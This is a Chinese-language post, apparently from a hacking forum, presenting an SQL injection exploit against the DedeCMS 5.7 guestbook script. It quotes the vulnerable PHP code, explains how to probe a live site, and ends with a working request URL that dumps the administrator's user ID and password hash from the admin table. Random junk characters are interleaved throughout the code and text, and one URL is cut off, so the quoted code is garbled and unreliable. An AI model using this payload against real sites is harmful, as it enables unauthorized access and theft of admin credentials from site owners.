dedecms5.7最新sql注射漏洞利用 guestbook.php

admin

影响版本为5.7

漏洞文件edit.inc.php具体代码：

< ?php  
9 k4 O# X! a/ o# }  H5 }& u( P9 M
if(!defined('DEDEINC')) exit('Request Error!');  
; Q5 W  g# v* W% U7 f! ^" b
   

if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];  

else $GUEST_BOOK_POS = "guestbook.php";  

/ A3 p, i+ D% u$ q+ N   
/ X0 @/ W7 r4 W: X
$id = intval($id);  
1 T% a2 `: \/ z3 ]4 P# t
if(empty($job)) $job='view';  

   
- j/ M/ f' j% L# X
if($job=='del' && $g_isadmin)  

6 i0 G0 T6 ~; t! \7 L. z/ f/ S{  
" I2 t) l% \% ?1 h# J/ H0 g* U  h. O
$dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");  
$ _+ w$ X5 R. c7 N2 ]% O  O# u
ShowMsg("成功删除一条留言！", $GUEST_BOOK_POS);  

exit();  

}  

- y* b( \4 E3 \+ T) Q$ pelse if($job=='check' && $g_isadmin)  

0 }' f4 g' m$ b- k( d. K{  
# I( r+ f- F! b' P' c
$dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");  

2 `* Q) k6 }# H9 e. t, H4 |ShowMsg("成功审核一条留言！", $GUEST_BOOK_POS);  

exit();  

4 Y/ D7 @! ^6 J7 n; R7 I$ \}  
- H# k  @% t! ~( k3 ^( P* U
4 Q- h9 u# \% Q( f& Y  `3 w4 P# selse if($job=='editok')  

{  

: u  i" }. R' K' j, L$remsg = trim($remsg);  

/ m& i' m0 @' Aif($remsg!='')  
. z; V& b) w: ]4 x; Q
" }# k$ V/ H* W{  

$ F: h( G2 _1 V. H//管理员回复不过滤HTML By:Errorera blog:errs.cc  

% v+ ^& L3 J+ \0 L" q2 M) ^  @if($g_isadmin)  
3 d" f# x* @. q1 J+ O
{  

$msg = "<div class='rebox'>".$msg."</div>\n".$remsg;  

//$remsg <br /><font color=red>管理员回复：</font> }  

else

) C& k# \- A# M, T; v  o{  

: D0 u0 \( \' s" K* Q6 ~$row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");  
5 m$ X0 v3 I6 v8 X1 P  _5 {
+ L! }# I7 ^% |' H7 i+ _$oldmsg = "<div class='rebox'>".addslashes($row['msg'])."</div>\n";  
# T3 r6 N1 h6 L0 s
$remsg = trimMsg(cn_substrR($remsg, 1024), 1);  

$msg = $oldmsg.$remsg;  

}  

5 k8 |9 y5 v5 m) F}  
- s" r8 F+ J! r6 u( k( I
; v0 t0 k( Q+ J  v//这里没有对$msg过滤，导致可以任意注入了By:Errorera home:www.errs.cc  

$dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");  

/ V! D, R: z- HShowMsg("成功更改或回复一条留言！", $GUEST_BOOK_POS);  

' x* v2 Y1 z# K0 \exit();  

7 s0 ^9 d4 d" t7 g; E) T0 U}  

0 R* W5 s8 J9 L2 x. w- }' d//home:www.errs.cc  
8 K- m! o1 z4 D# M/ W; [. Q7 z
) {! a% o  F, e/ vif($g_isadmin)  

{  

, j# e1 R" {) h+ o* x- n$row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");  

require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');  

}  
; D5 N, J1 z, @6 T) T; d. q
else

{  
7 \7 F) _) \5 C% B7 ?& s  m& h
! N: `5 a  C( N$row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");  

% ~4 A. R" c# [2 [require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');  

  m2 R, |  `& V, P7 W} 漏洞成功需要条件：
1. php magic_quotes_gpc=off
2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。
$ h0 H9 E" s2 ], w0 M
) w" ^6 b9 J. w" `0 q! Y怎么判断是否存在漏洞：
9 f  y/ V6 `$ }, P) D( @% E先打开www.xxx.com/plus/guestbook.php 可以看到别人的留言，
( X+ X: ]/ ?- }' a, B1 d' D7 [3 q然后鼠标放在 [回复/编辑] 上 可以看到别人留言的ID。那么记下ID
+ T  H) ?" w, L2 B) _3 K6 {) C访问：
* N6 Q+ ^3 }, b6 g& r; H
% B% z8 U' ~7 H* _5 @www.xxx.com/plus/guestbook.php?a ... tok&msg=errs.cc存在的留言ID提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 errs.cc’ 如果变成了 那么证
. R- H6 N2 K( p! f5 O/ J  ~# `
/ S) k# _7 S8 P6 \! K
9 M& c# c! p* y4 D4 F; \明漏洞无法利用应为他开启了 php magic_quotes_gpc=off
, B9 s$ D7 R, Y/ i% ^) D: @如果没有修改成功，那留言ID的内容还是以前的 那就证明漏洞可以利用。
- h: ]! |3 Z4 M2 Y( [" t那么再次访问
8 _. t; G7 a7 U! b
6 @7 x; y4 k. h6 D, vwww.xxx.com/plus/guestbook.php?a ... ;job=editok&id=存在的留言ID&msg=',msg=user(),email='然后返回，那条留言ID的内容就直接修改成了mysql 的user().
7 t8 u6 f; H  b) d) _' p
大概利用就是这样，大家有兴趣的多研究下！！
( `) X  B, e9 w, k3 v
最后补充下，估计有人会说怎么暴管理后台帐户密码，你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)！！
3 M0 [5 _' Y6 s
view sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='